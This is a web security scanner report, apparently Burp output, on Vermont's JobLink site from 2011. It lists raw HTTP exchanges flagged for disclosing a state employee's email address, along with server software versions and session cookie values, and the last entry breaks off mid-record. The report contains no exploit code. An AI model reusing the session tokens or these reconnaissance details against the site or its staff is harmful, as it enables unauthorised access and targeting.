GET /ada/customization/Vermont/images/1p.gif HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 49 Content-Type: image/gif Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/1p.gif Last-Modified: Fri, 22 Oct 2010 17:19:52 GMT Accept-Ranges: bytes ETag: "8db9756d72cb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/images/crop_hump2.jpg HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 51151 Content-Type: image/jpeg Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/crop_hump2.jpg Last-Modified: Fri, 22 Oct 2010 17:20:03 GMT Accept-Ranges: bytes ETag: "3c172b5dd72cb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/images/statebullet.png HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 5822 Content-Type: image/png Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/statebullet.png Last-Modified: Fri, 22 Oct 2010 17:20:26 GMT Accept-Ranges: bytes ETag: "a8fd16bd72cb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/images/vt_logo.gif HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 2903 Content-Type: image/gif Content-Location: https://www.vermontjoblink.com/ada/customization/Vermont/images/vt_logo.gif Last-Modified: Fri, 22 Oct 2010 17:20:33 GMT Accept-Ranges: bytes ETag: "827d306fd72cb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/1p.gif HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 49 Content-Type: image/gif Content-Location: https://www.vermontjoblink.com/ada/global/images/1p.gif Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT Accept-Ranges: bytes ETag: "013e9c6c46ecb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/error.gif HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Content-Length: 898 Content-Type: image/gif Content-Location: https://www.vermontjoblink.com/ada/global/images/error.gif Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT Accept-Ranges: bytes ETag: "013e9c6c46ecb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:07:36 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/kswksbgd.gif HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 66 Content-Type: image/gif Content-Location: https://www.vermontjoblink.com/ada/global/images/kswksbgd.gif Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT Accept-Ranges: bytes ETag: "013e9c6c46ecb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:54 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/printericonA.png HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/works/Login.cfm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Content-Length: 167 Content-Type: image/png Content-Location: https://www.vermontjoblink.com/ada/global/images/printericonA.png Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT Accept-Ranges: bytes ETag: "013e9c6c46ecb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:08:05 GMT
The following email addresses were disclosed in the response:
amix@amix.dk
joseph.lucia@state.vt.us
Request
GET /ada/global/spellchecker/googiespell/AJS.js HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 41910 Content-Type: application/x-javascript Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/AJS.js Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT Accept-Ranges: bytes ETag: "08c55c3c46ecb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:51 GMT
/* Last Modified: 29/04/07 18:44:48
AJS JavaScript library A very small library with a lot of functionality AUTHOR 4mir Salihefendic (http://amix.dk) - amix@amix.dk LICENSE Copyright (c) 2006 Amir Salihefendic. All rights reserved. Copyright (c) 2005 Bob Ippolito. All rights reserved. http://www.opensource.org/licenses/mit-license.php VERSION
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
